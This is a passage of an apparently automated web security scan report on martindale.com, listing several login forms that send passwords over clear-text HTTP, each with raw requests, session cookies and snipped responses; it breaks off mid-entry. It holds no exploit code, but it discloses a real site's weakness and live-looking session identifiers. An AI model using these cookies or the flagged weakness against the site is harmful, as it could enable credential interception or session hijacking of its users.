X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954557277473&InitialSearchId=201104160954557277473; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:56 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 64739
Connection: close
X-RE-Ref: 1 -2133384255
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Contact Us</title>
<meta http-equiv="Conten
...[SNIP]...
<body onload="contactUsInit()">
<form name="frmContactUS" method="post" action="/ContactUs.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="frmContactUS">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl01$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl01_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.55. http://www.martindale.com/all/c-england/all-lawyers-1.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-1.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /all/c-england/all-lawyers-1.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:28 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954287277539&InitialSearchId=201104160954287277539; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:28 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 94108
Connection: close
X-RE-Ref: 1 2133459339
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-1.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.56. http://www.martindale.com/all/c-england/all-lawyers-10.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-10.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /all/c-england/all-lawyers-10.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:56 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954577277646&InitialSearchId=201104160954577277646; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:56 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 90129
Connection: close
X-RE-Ref: 1 -2143489616
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-10.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.57. http://www.martindale.com/all/c-england/all-lawyers-11.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-11.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /all/c-england/all-lawyers-11.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:48 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954497277627&InitialSearchId=201104160954497277627; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:48 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 91416
Connection: close
X-RE-Ref: 1 -2142286042
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-11.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.58. http://www.martindale.com/all/c-england/all-lawyers-2.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-2.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
   /all/c-england/all-lawyers-2.htm?c=N
The form contains the following password field:
   ctl06$ucLogin$txtFlyOutPassword

Request

GET /all/c-england/all-lawyers-2.htm?c=N HTTP/1.1
Host: www.martindale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=4536f10003b84d77a65f457425f341af; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi02f0ex2c45; op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi02f0ex2c45; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302912241758:ss=1302912241758; MH_survey_MDC64=2; __utma=205508303.24449278.1302905514.1302905514.1302912242.2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 94165
Content-Type: text/html; charset=iso-8859-1
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rky33raxqbxwd045bmozrc45; path=/; HttpOnly
Set-Cookie: mdc_session_id=ede5124cf8ba4baf8d1f4a707220d522; expires=Sat, 16-Apr-2011 14:42:05 GMT; path=/
Set-Cookie: refDomain=www.martindale.com; path=/
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=ede5124cf8ba4baf8d1f4a707220d522&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:42:06 GMT; path=/
Date: Sat, 16 Apr 2011 13:47:06 GMT
X-RE-Ref: 1 1691745825
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-2.htm?c=N" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.59. http://www.martindale.com/all/c-england/all-lawyers-3.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-3.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
   /all/c-england/all-lawyers-3.htm?c=N
The form contains the following password field:
   ctl06$ucLogin$txtFlyOutPassword

Request

GET /all/c-england/all-lawyers-3.htm?c=N HTTP/1.1
Host: www.martindale.com
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers-2.htm?c=N
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=4536f10003b84d77a65f457425f341af; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; mdc_session_id=e42928a5acac4e6598b36e4172c30143; refDomain=www.martindale.com; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0e03nh4d09; op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0e03nh4d09; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961642795:ss=1302961642795; MH_survey_MDC64=3; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; __utmb=205508303.1.10.1302961643

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 93552
Content-Type: text/html; charset=iso-8859-1
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:43:42 GMT; path=/
Date: Sat, 16 Apr 2011 13:48:41 GMT
X-RE-Ref: 1 1788055145
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-3.htm?c=N" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.60. http://www.martindale.com/all/c-england/all-lawyers-4.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-4.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
   /all/c-england/all-lawyers-4.htm?c=N
The form contains the following password field:
   ctl06$ucLogin$txtFlyOutPassword

Request

GET /all/c-england/all-lawyers-4.htm?c=N HTTP/1.1
Host: www.martindale.com
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers-3.htm?c=N
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=4536f10003b84d77a65f457425f341af; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; mdc_session_id=e42928a5acac4e6598b36e4172c30143; refDomain=www.martindale.com; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; __utmb=205508303.2.10.1302961643; MH_survey_MDC64=0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 93299
Content-Type: text/html; charset=iso-8859-1
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:46:11 GMT; path=/
Date: Sat, 16 Apr 2011 13:51:11 GMT
X-RE-Ref: 1 1935620653
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-4.htm?c=N" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.61. http://www.martindale.com/all/c-england/all-lawyers-5.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-5.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
   /all/c-england/all-lawyers-5.htm
The form contains the following password field:
   ctl06$ucLogin$txtFlyOutPassword

Request

GET /all/c-england/all-lawyers-5.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:41 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954417277705&InitialSearchId=201104160954417277705; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:41 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 90695
Connection: close
X-RE-Ref: 1 2145862008
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-5.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.62. http://www.martindale.com/all/c-england/all-lawyers-6.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-6.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
   /all/c-england/all-lawyers-6.htm
The form contains the following password field:
   ctl06$ucLogin$txtFlyOutPassword

Request

GET /all/c-england/all-lawyers-6.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:42 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954427277709&InitialSearchId=201104160954427277709; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:42 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 90561
Connection: close
X-RE-Ref: 1 2147198933
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-6.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.63. http://www.martindale.com/all/c-england/all-lawyers-7.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-7.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
   /all/c-england/all-lawyers-7.htm
The form contains the following password field:
   ctl06$ucLogin$txtFlyOutPassword

Request

GET /all/c-england/all-lawyers-7.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:43 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954427277440&InitialSearchId=201104160954427277440; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:43 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 90154
Connection: close
X-RE-Ref: 1 -2146167431
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-7.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.64. http://www.martindale.com/all/c-england/all-lawyers-8.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-8.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
   /all/c-england/all-lawyers-8.htm
The form contains the following password field:
   ctl06$ucLogin$txtFlyOutPassword

Request

GET /all/c-england/all-lawyers-8.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:48 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954497277629&InitialSearchId=201104160954497277629; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:48 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 90203
Connection: close
X-RE-Ref: 1 -2143880249
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-8.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.65. http://www.martindale.com/all/c-england/all-lawyers-9.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
